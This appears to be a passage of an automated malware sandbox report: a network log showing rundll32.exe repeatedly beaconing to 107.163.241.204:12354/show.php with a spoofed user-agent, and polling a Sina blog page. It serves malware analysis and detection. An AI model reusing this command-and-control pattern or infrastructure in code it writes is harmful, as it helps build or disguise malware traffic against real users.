                                                      17192.168.2.949903107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:06.152331114 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache
                                                      Dec 11, 2024 16:25:59.666007996 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.949905107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:06.274705887 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.949906202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:06.345331907 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:08.003690958 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:07 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.949929107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:08.387660980 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.949932107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:08.515805960 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.949952107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:10.281122923 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.949954202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:10.395219088 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:12.056432962 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.949955107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:10.395332098 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.949979107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:12.511389971 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.949983107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:12.745274067 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.950000107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:14.301184893 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.950002107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:14.417965889 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      29192.168.2.950003202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:14.466578007 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:16.057897091 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      30192.168.2.950028107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:16.547029018 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.950032107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:16.778321028 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.950048107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:18.315104961 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      33192.168.2.950050107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:18.452539921 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.950051202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:18.452672005 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:20.017344952 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.950077107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:20.594185114 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.950080107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:20.703990936 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.950100107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:22.356342077 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.950102107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:22.471931934 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.950103202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:22.472050905 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:24.055720091 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:23 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.950127107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:24.615520000 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.950130107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:24.783198118 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.950150107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:26.361162901 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.950152107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:26.471364975 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.950153202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:26.471508026 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:28.046827078 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.950177107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:28.697782040 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.950180107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:28.773125887 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      47192.168.2.950200107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:30.373579025 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      48192.168.2.950203202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:30.487062931 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:32.061713934 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:31 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.950204107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:30.487552881 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.950233107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:32.612746000 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.950236107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:32.730777979 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.950255107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:34.380562067 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.950257107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:34.486502886 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.950258202.108.0.52807556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:34.486591101 CET118OUTGET /u/5655029807 HTTP/1.1
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                      Host: blog.sina.com.cn
                                                      Dec 11, 2024 16:24:36.063488960 CET371INHTTP/1.1 302 Moved Temporarily
                                                      Server: nginx/1.2.8
                                                      Date: Wed, 11 Dec 2024 15:24:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 160
                                                      Connection: keep-alive
                                                      Location: https://blog.sina.com.cn/u/5655029807
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      55192.168.2.950289107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:36.604049921 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                      Host: 107.163.241.204:12354
                                                      Cache-Control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      56192.168.2.950292107.163.241.204123547556C:\Windows\SysWOW64\rundll32.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 11, 2024 16:24:36.737837076 CET184OUTGET /show.php HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
